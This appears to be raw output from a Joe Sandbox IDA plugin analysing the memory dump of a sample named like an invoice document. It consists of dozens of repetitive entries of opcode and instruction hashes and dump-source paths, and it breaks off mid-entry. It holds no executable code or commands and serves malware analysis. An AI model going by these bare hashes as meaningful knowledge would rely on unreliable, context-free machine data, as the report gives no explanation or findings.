                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                • Instruction ID: 1eef5b761b4679f8930a04d62a27094183a4286716d9e9f0c52d928bf63378d1
                                                                                                                                • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                • Instruction Fuzzy Hash: D8110436A00909AFDB19CB58C845B9DFBB5EF84710F05826DE84597344E631BE41CB80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                • Instruction ID: 65fc7179ac838f9f0f8db4054171bb5b9dac7d10f03f24145475155999845ce2
                                                                                                                                • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                • Instruction Fuzzy Hash: 8C2106B5A00B059FD3A0CF29D440B52BBF4FB48B20F10492EE98AC7B50E371E814CB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                • Instruction ID: faf975da205d00c1fd6dd3b0f36308f3a3c4eb4a26c3db1672da744c81a62b05
                                                                                                                                • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                • Instruction Fuzzy Hash: C811A0326D0601EFE721AF49C848B5EFBE5EF45754F059428EA099B260DF71DC40DB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 42ec02f72b49c9a6554dfcd198bf57e087792bab803fd94b5348dd10c0b1ae30
                                                                                                                                • Instruction ID: c0b170e8ee045eed2efedda403a4a1bae8e9490620533c60cd29d47f7a1be958
                                                                                                                                • Opcode Fuzzy Hash: 42ec02f72b49c9a6554dfcd198bf57e087792bab803fd94b5348dd10c0b1ae30
                                                                                                                                • Instruction Fuzzy Hash: 6E014931745685AFE316A66EDC48F27FB8CEF90390F0500B5FD009B296DA54DC01C271
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8d101467eaa5e8478038658f2398112c9c5a3d8b5026ddd424fb7242ac9780c0
                                                                                                                                • Instruction ID: cca00b15c86cd606229ca11550e41065146dc7b054c2fd7b14d89451c839b635
                                                                                                                                • Opcode Fuzzy Hash: 8d101467eaa5e8478038658f2398112c9c5a3d8b5026ddd424fb7242ac9780c0
                                                                                                                                • Instruction Fuzzy Hash: 4711A036600745EFDB27CF5DD944B56BBE8EB86764F005119FA068B690C770E800CF60
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8b688fcb5cfa3dd8b388b52e6bcbdc6acfcee4c63b5fc0e452e44097eafc62ad
                                                                                                                                • Instruction ID: 312e1d4d84b878de25ba4905e9eb24e115d72aadfb9bf6f5c71552289956f4e9
                                                                                                                                • Opcode Fuzzy Hash: 8b688fcb5cfa3dd8b388b52e6bcbdc6acfcee4c63b5fc0e452e44097eafc62ad
                                                                                                                                • Instruction Fuzzy Hash: 3E11C2362006199FD7229B6DD844F67F7B6FFD4720F194429EA8787A94DA30A802CB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a51e11c605ceb8dd39a41ac11a568dee162a484d90fea5302c42b8e3c7395819
                                                                                                                                • Instruction ID: 6ead4c3d4cc822fcc186ec53b81fb78956d4995d65eb0771bd791df9f077ff45
                                                                                                                                • Opcode Fuzzy Hash: a51e11c605ceb8dd39a41ac11a568dee162a484d90fea5302c42b8e3c7395819
                                                                                                                                • Instruction Fuzzy Hash: B1118272A00715FBDB22DF59C984B5EFBB8FF84790F510459EA01A7245D730AE019B60
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a216ca72cf9d660dfb4968e1d0c58131b90ea08d986a17045ea1c32bbc6b59f4
                                                                                                                                • Instruction ID: f6d62f2e7707a9bba2c4763c8daed040a51fec3c01dc22b0ee581887c0348749
                                                                                                                                • Opcode Fuzzy Hash: a216ca72cf9d660dfb4968e1d0c58131b90ea08d986a17045ea1c32bbc6b59f4
                                                                                                                                • Instruction Fuzzy Hash: C4019E7150120A9FC725DF19D448F26FBF9EB85324F21816EE2058B2A8CB70AD82CB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                • Instruction ID: 35e54029b00838ee43cf05dbbc7f0aafdd3c82125fbf8118db311e470639d43b
                                                                                                                                • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                • Instruction Fuzzy Hash: EA110C712116D19BE723972DD968F25F7D8FF01754F1900E0DD41C7642F728C982C650
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                • Instruction ID: c8a28e996fd46f0966e681a1791f1d1a0e5cb9205ff0c77926077d404b98d63f
                                                                                                                                • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                • Instruction Fuzzy Hash: 33019236640205EFE725BF58CC08F5AFBA9EB95760F058474EA059B264EB71DD80C790
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                • Instruction ID: a73b6e0ceeae27a3068a9400c6c1adf3fb0bb37b66932eefced177091554f87a
                                                                                                                                • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                • Instruction Fuzzy Hash: EA012635604B219BCB318F99EC40A327BA4EF55770704C62DFE998B281C731D401CBA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3aa8352d21504409645d1e377c82fa36c7ad44a6f58fb2a7fc0ac6bea989e970
                                                                                                                                • Instruction ID: eece90d06cd5b907cd939ff715d347b8dfbdfb04b7f5afeda73ebe393426707a
                                                                                                                                • Opcode Fuzzy Hash: 3aa8352d21504409645d1e377c82fa36c7ad44a6f58fb2a7fc0ac6bea989e970
                                                                                                                                • Instruction Fuzzy Hash: 120145335412059FC332DF1EC844E12FBB8EB81770B254265E9AA9B5AAE730EC01CBC0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5965993aa4ce8ddc20320f4189e16413a02a8f28534ce97c085479aab226fbe1
                                                                                                                                • Instruction ID: 35df96cc259612313d1af53a4f382ce2ec42940904ae87bad46a781c982b4bb2
                                                                                                                                • Opcode Fuzzy Hash: 5965993aa4ce8ddc20320f4189e16413a02a8f28534ce97c085479aab226fbe1
                                                                                                                                • Instruction Fuzzy Hash: 5211CB32241601EFCB26AF09C880F06BBB8FF58B44F2000A8EA058B6A1C631ED01CA90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 09e87c1217c78027db69dc26d2eeafff44ed387867a92b83bfca19bba76b26eb
                                                                                                                                • Instruction ID: 6f7c75bc1a0d11d42ef2685a7998a6657fa8432e817fa6834c045231f8cd6ed3
                                                                                                                                • Opcode Fuzzy Hash: 09e87c1217c78027db69dc26d2eeafff44ed387867a92b83bfca19bba76b26eb
                                                                                                                                • Instruction Fuzzy Hash: DE119A70641229ABDB26EF24CC56FE9B3B4AF04720F5041D4B318A60E5EB309E91CF84
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8a9e9df10f6a731dedff75217ba08f67ee0009a6fa07441a9b85d0efc2efd84d
                                                                                                                                • Instruction ID: 99b660a1ae438a3fe193cb3d138b3918e186e86c69de24a3b057d66003f2526c
                                                                                                                                • Opcode Fuzzy Hash: 8a9e9df10f6a731dedff75217ba08f67ee0009a6fa07441a9b85d0efc2efd84d
                                                                                                                                • Instruction Fuzzy Hash: BB111776900019BBCB16EB94CC84EDFBB7DEF48254F044166A906E7211EA34AA55CBE0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                • Instruction ID: 460c8f8bcd715e79abea9c1efeedec6c980f266c6fffe6c71da83181a7476328
                                                                                                                                • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                • Instruction Fuzzy Hash: EF01F533200310CBDF52CA2DD888A52F7ABBFC4610F5544A5ED458F29BDAB1C881C3A0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4da73f909de50b1ebd94f7f583694f997c96623439c4d5e9d044aff3771d574e
                                                                                                                                • Instruction ID: 026ba98c6c26508fb022e9b0c12688bfe7abe1b8e5c2b88edc62304ceccd665d
                                                                                                                                • Opcode Fuzzy Hash: 4da73f909de50b1ebd94f7f583694f997c96623439c4d5e9d044aff3771d574e
                                                                                                                                • Instruction Fuzzy Hash: C311E5726001459FC701CF18E400BA2FBB5FB5A314F188259F8448B315D731EC84CBA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7ae47875e09254b16e5e2bc3777a8ed709695807652362966965de626962a3c4
                                                                                                                                • Instruction ID: 2359c43f7abcd868d2b6fe4401b95d1d5dee215014c13ee12a98092c576784aa
                                                                                                                                • Opcode Fuzzy Hash: 7ae47875e09254b16e5e2bc3777a8ed709695807652362966965de626962a3c4
                                                                                                                                • Instruction Fuzzy Hash: 9E1118B1A102099FCB00DFA9D545AAEFBF8FF58250F10806AA905E7355D674EA018BA4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ff130ef6a3765a8cd5ddb81e46fb429191e75d9bb116d6a317cb54d8315ceccb
                                                                                                                                • Instruction ID: 7ed7d3beeeeb24908fd659ce8eae808a3f89190dfc8037297915bb170ae15b82
                                                                                                                                • Opcode Fuzzy Hash: ff130ef6a3765a8cd5ddb81e46fb429191e75d9bb116d6a317cb54d8315ceccb
                                                                                                                                • Instruction Fuzzy Hash: CA0124311402119BCB32AF298494D37FBBAFFD16A0BA4446EF2110B215CF30EE81CB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                • Instruction ID: cac5fd6370cf8c2b3d6a1ca96e6efdaf06f02d934483156fd8f201fbfb801022
                                                                                                                                • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                • Instruction Fuzzy Hash: D701F432300689ABD723AB1DC80DF59FFD9EF81754F0940E6FA449B6A2D6B8C941C221
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: db77969ada8b597ba046c05e28919609e1858c5fffcb19534c795603d95d7205
                                                                                                                                • Instruction ID: d452d437974c3ef2763a2166f5a8d973f5ac5e5a13ee7da042f620e5e42f54d6
                                                                                                                                • Opcode Fuzzy Hash: db77969ada8b597ba046c05e28919609e1858c5fffcb19534c795603d95d7205
                                                                                                                                • Instruction Fuzzy Hash: 51012C71A102599BDB04DFA9D445AAEFBB8EF58310F14405AF505A7290D774AA01CB94
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                • Instruction ID: 8c8e1c22019fac10b34d20a4585d5525909278caa46128a49fc343edeed8d0f1
                                                                                                                                • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                • Instruction Fuzzy Hash: 25F0127220001DBFEF019F94DD80DAFBB7DEB55698B104125FA1192160D631DD21A7A0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 807db1a907905feedd6af5e963048d2a88b409a13410ed0f4d933e1307321de8
                                                                                                                                • Instruction ID: b4412a2445a6bbaa72174215b9ad5f0d8161da46926c5645e6df31d27af86e32
                                                                                                                                • Opcode Fuzzy Hash: 807db1a907905feedd6af5e963048d2a88b409a13410ed0f4d933e1307321de8
                                                                                                                                • Instruction Fuzzy Hash: 1A018936100149ABCF12AE84D840EDA7F66FB4C664F058116FE1866224C332D9B0EB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8064f7ae382c48982460a3c5b6b80c89762ebcbdb89973573fcfb4d16deb2980
                                                                                                                                • Instruction ID: 31b73c4db135c3d7b23338d4de90435a68e48c6858999142747bb58fed4b1589
                                                                                                                                • Opcode Fuzzy Hash: 8064f7ae382c48982460a3c5b6b80c89762ebcbdb89973573fcfb4d16deb2980
                                                                                                                                • Instruction Fuzzy Hash: 86F024726042495BF354DA1D8C02F23329AE7D0696FA5806EEB058B3C1EF71DC1283A6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7867d6273d849eea0914d82b81dec573d0326eddbea1b25343e8e3802ca79400
                                                                                                                                • Instruction ID: 73cf9a47e2c8b145a7eb3f894fa6fe0618934c9c98cc488b6cbe50a5333b8290
                                                                                                                                • Opcode Fuzzy Hash: 7867d6273d849eea0914d82b81dec573d0326eddbea1b25343e8e3802ca79400
                                                                                                                                • Instruction Fuzzy Hash: AE01A470301681ABE7229B2CCD4CF25BBE4BB80B14F5841A4BA019B6DBD728D541C220
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                • Instruction ID: ac8e2bd7dba67c94de5246563d6f4fc9bfe3c536439dff5f61264cd616cb40c7
                                                                                                                                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                • Instruction Fuzzy Hash: 06F0E93534191347EB35AA2E8424B2EEA559FD0A01B4D472D9603EB644DFA1D8058790
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                • Instruction ID: de8f51ccfb9caabe7a984b457dac0bf8a80a2489880a545ef30a013a6fa5e0f8
                                                                                                                                • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                • Instruction Fuzzy Hash: 25F082337E56229BE331AE4ECC80F1AF7A8EFD5A60F191475A6149B264CB60EC41C7D0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1f1f19c1b197651d8d75ec47f5a3d49f05f31c59b327a46873976ab5d37eec7e
                                                                                                                                • Instruction ID: 85e0d51f55ec4d9011eb6944c06f71e40d6fffd7aa350a5c9acb2cbc2df5ecb1
                                                                                                                                • Opcode Fuzzy Hash: 1f1f19c1b197651d8d75ec47f5a3d49f05f31c59b327a46873976ab5d37eec7e
                                                                                                                                • Instruction Fuzzy Hash: BDF0AF706593049FC310EF68C445A1BF7E4FF98710F80465AB898DB394E634E900CB96
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                • Instruction ID: a255d424a4dc6c927bb3d4c465695fc852ce311719750ff573b958c35370a1b1
                                                                                                                                • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                • Instruction Fuzzy Hash: 0FF02472600200AFE314DF25CC00F86B7E9EFE8304F148078A544CB164FAB0DD10C694
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ae0507967317bd6a6f0c3e47b5aa2870c17e7855cf5eadace00ae7f604956a71
                                                                                                                                • Instruction ID: 19df370ede48d378798e223da9b4cb2de232315d7249ec021c158208ef82181a
                                                                                                                                • Opcode Fuzzy Hash: ae0507967317bd6a6f0c3e47b5aa2870c17e7855cf5eadace00ae7f604956a71
                                                                                                                                • Instruction Fuzzy Hash: 8AF06270A01249DFCB04EFA9C515EAEF7B4FF18300F108059B955EB399DA34EA01CB64
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8bfb67d5f7a1272fa2c85d23f381115aba095f3cb7d27e387c8cabf60744d21d
                                                                                                                                • Instruction ID: f36c0fd6dd9cdb6503e58c11651ea6757317af21fb2b42147e68092d077f135d
